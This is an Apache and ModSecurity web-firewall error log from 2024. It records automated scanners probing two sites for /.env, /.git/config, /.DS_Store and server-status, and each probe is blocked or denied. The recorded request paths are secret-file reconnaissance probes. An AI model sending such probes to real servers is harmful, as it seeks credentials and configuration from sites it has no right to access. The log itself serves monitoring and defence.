[Sun Aug 11 02:45:07.898797 2024] [:error] [pid 1091648] [client 83.147.52.49:36328] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZrgJk5N99bIqmNuqzXxG5wAAAGg"]
[Sun Aug 11 02:45:07.899002 2024] [:error] [pid 1091648] [client 83.147.52.49:36328] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZrgJk5N99bIqmNuqzXxG5wAAAGg"]
[Sun Aug 11 19:55:08.877088 2024] [:error] [pid 1096820] [client 45.148.10.142:45002] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zrj6_Dyyf5MYs1B7_MQZOQAAAAo"]
[Sun Aug 11 19:55:08.877388 2024] [:error] [pid 1096820] [client 45.148.10.142:45002] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zrj6_Dyyf5MYs1B7_MQZOQAAAAo"]
[Sun Aug 11 19:55:08.877548 2024] [:error] [pid 1096820] [client 45.148.10.142:45002] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zrj6_Dyyf5MYs1B7_MQZOQAAAAo"]
[Sun Aug 11 19:55:09.030554 2024] [:error] [pid 1096834] [client 45.148.10.142:45012] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zrj6_Qm3etGq8eTP47CjJwAAAAg"]
[Sun Aug 11 19:55:09.030812 2024] [:error] [pid 1096834] [client 45.148.10.142:45012] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zrj6_Qm3etGq8eTP47CjJwAAAAg"]
[Sun Aug 11 19:55:09.030968 2024] [:error] [pid 1096834] [client 45.148.10.142:45012] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zrj6_Qm3etGq8eTP47CjJwAAAAg"]
[Tue Aug 20 11:53:02.344824 2024] [:error] [pid 1307614] [client 45.148.10.142:58032] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZsRnfnMgTT3xzg8WeKUjgwAAAAY"]
[Tue Aug 20 11:53:02.346188 2024] [:error] [pid 1307614] [client 45.148.10.142:58032] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZsRnfnMgTT3xzg8WeKUjgwAAAAY"]
[Tue Aug 20 11:53:02.346352 2024] [:error] [pid 1307614] [client 45.148.10.142:58032] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZsRnfnMgTT3xzg8WeKUjgwAAAAY"]
[Tue Aug 20 11:53:02.406551 2024] [:error] [pid 1322094] [client 45.148.10.142:58034] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZsRnfpD1jNRwBAnYl3Gk2AAAAAg"]
[Tue Aug 20 11:53:02.406780 2024] [:error] [pid 1322094] [client 45.148.10.142:58034] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZsRnfpD1jNRwBAnYl3Gk2AAAAAg"]
[Tue Aug 20 11:53:02.406917 2024] [:error] [pid 1322094] [client 45.148.10.142:58034] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZsRnfpD1jNRwBAnYl3Gk2AAAAAg"]
[Sun Aug 25 01:32:01.451794 2024] [:error] [pid 1438857] [client 45.148.10.142:50836] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZsptcZWRs87ibXi1DLXI8AAAAAA"]
[Sun Aug 25 01:32:01.453612 2024] [:error] [pid 1438857] [client 45.148.10.142:50836] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZsptcZWRs87ibXi1DLXI8AAAAAA"]
[Sun Aug 25 01:32:01.453809 2024] [:error] [pid 1438857] [client 45.148.10.142:50836] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZsptcZWRs87ibXi1DLXI8AAAAAA"]
[Sun Aug 25 01:32:01.459512 2024] [:error] [pid 1439151] [client 45.148.10.142:50838] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZsptcTTJJdWkdOxOkqL60QAAAAY"]
[Sun Aug 25 01:32:01.459721 2024] [:error] [pid 1439151] [client 45.148.10.142:50838] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZsptcTTJJdWkdOxOkqL60QAAAAY"]
[Sun Aug 25 01:32:01.459872 2024] [:error] [pid 1439151] [client 45.148.10.142:50838] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZsptcTTJJdWkdOxOkqL60QAAAAY"]
[Sun Sep 15 21:03:40.938333 2024] [authz_core:error] [pid 1945703] [client 178.128.207.138:53022] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Sep 15 21:03:45.701930 2024] [:error] [pid 1945740] [client 178.128.207.138:49388] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZucvkYyxe48jtv2Ik6Q_8AAAAAI"]
[Sun Sep 15 21:03:45.702724 2024] [:error] [pid 1945740] [client 178.128.207.138:49388] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZucvkYyxe48jtv2Ik6Q_8AAAAAI"]
[Sun Sep 15 21:03:45.703251 2024] [:error] [pid 1945740] [client 178.128.207.138:49388] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZucvkYyxe48jtv2Ik6Q_8AAAAAI"]
[Sun Sep 15 21:03:45.757208 2024] [:error] [pid 1945743] [client 178.128.207.138:49394] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZucvkXS5tlCIU4PqdN2rBgAAAA4"]
[Sun Sep 15 21:03:45.757471 2024] [:error] [pid 1945743] [client 178.128.207.138:49394] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZucvkXS5tlCIU4PqdN2rBgAAAA4"]
[Sun Sep 15 21:03:45.757677 2024] [:error] [pid 1945743] [client 178.128.207.138:49394] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZucvkXS5tlCIU4PqdN2rBgAAAA4"]
[Sun Sep 15 21:03:45.945773 2024] [:error] [pid 1945741] [client 178.128.207.138:49404] [client 178.128.207.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zucvkc5DtG4sNXPsLgJVhgAAAAM"]
[Sun Sep 15 21:03:45.946351 2024] [:error] [pid 1945741] [client 178.128.207.138:49404] [client 178.128.207.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zucvkc5DtG4sNXPsLgJVhgAAAAM"]
[Sun Sep 15 21:03:45.946800 2024] [:error] [pid 1945741] [client 178.128.207.138:49404] [client 178.128.207.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zucvkc5DtG4sNXPsLgJVhgAAAAM"]
[Sun Sep 15 21:04:29.896141 2024] [:error] [pid 1945772] [client 179.43.168.130:57216] [client 179.43.168.130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZucvvccYLWmkVR__GZY5NQAAAAU"]
[Sun Sep 15 21:04:29.896708 2024] [:error] [pid 1945772] [client 179.43.168.130:57216] [client 179.43.168.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZucvvccYLWmkVR__GZY5NQAAAAU"]
[Sun Sep 15 21:04:29.897119 2024] [:error] [pid 1945772] [client 179.43.168.130:57216] [client 179.43.168.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZucvvccYLWmkVR__GZY5NQAAAAU"]
[Wed Sep 18 21:47:46.404485 2024] [:error] [pid 2001181] [client 45.148.10.206:50328] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZusuYr_3-o_g0vImYz8-_wAAAAg"]
[Wed Sep 18 21:47:46.406653 2024] [:error] [pid 2001181] [client 45.148.10.206:50328] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZusuYr_3-o_g0vImYz8-_wAAAAg"]
[Wed Sep 18 21:47:46.407130 2024] [:error] [pid 2001181] [client 45.148.10.206:50328] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZusuYr_3-o_g0vImYz8-_wAAAAg"]
[Thu Sep 19 06:57:00.333928 2024] [authz_core:error] [pid 2032559] [client 34.68.228.68:58948] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/
[Thu Sep 19 19:16:58.448743 2024] [:error] [pid 2043508] [client 45.148.10.206:39514] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZuxcijebqcjJiKMn9mFQQwAAAAo"]
[Thu Sep 19 19:16:58.449437 2024] [:error] [pid 2043508] [client 45.148.10.206:39514] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZuxcijebqcjJiKMn9mFQQwAAAAo"]
[Thu Sep 19 19:16:58.449969 2024] [:error] [pid 2043508] [client 45.148.10.206:39514] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZuxcijebqcjJiKMn9mFQQwAAAAo"]
[Thu Sep 19 21:04:50.888142 2024] [authz_core:error] [pid 2048958] [client 159.89.12.166:46548] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Sep 19 21:04:51.174033 2024] [:error] [pid 2048988] [client 159.89.12.166:46572] [client 159.89.12.166] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zux10ynGMA_vyF2guL_nDgAAAAY"]
[Thu Sep 19 21:04:51.174600 2024] [:error] [pid 2048988] [client 159.89.12.166:46572] [client 159.89.12.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zux10ynGMA_vyF2guL_nDgAAAAY"]
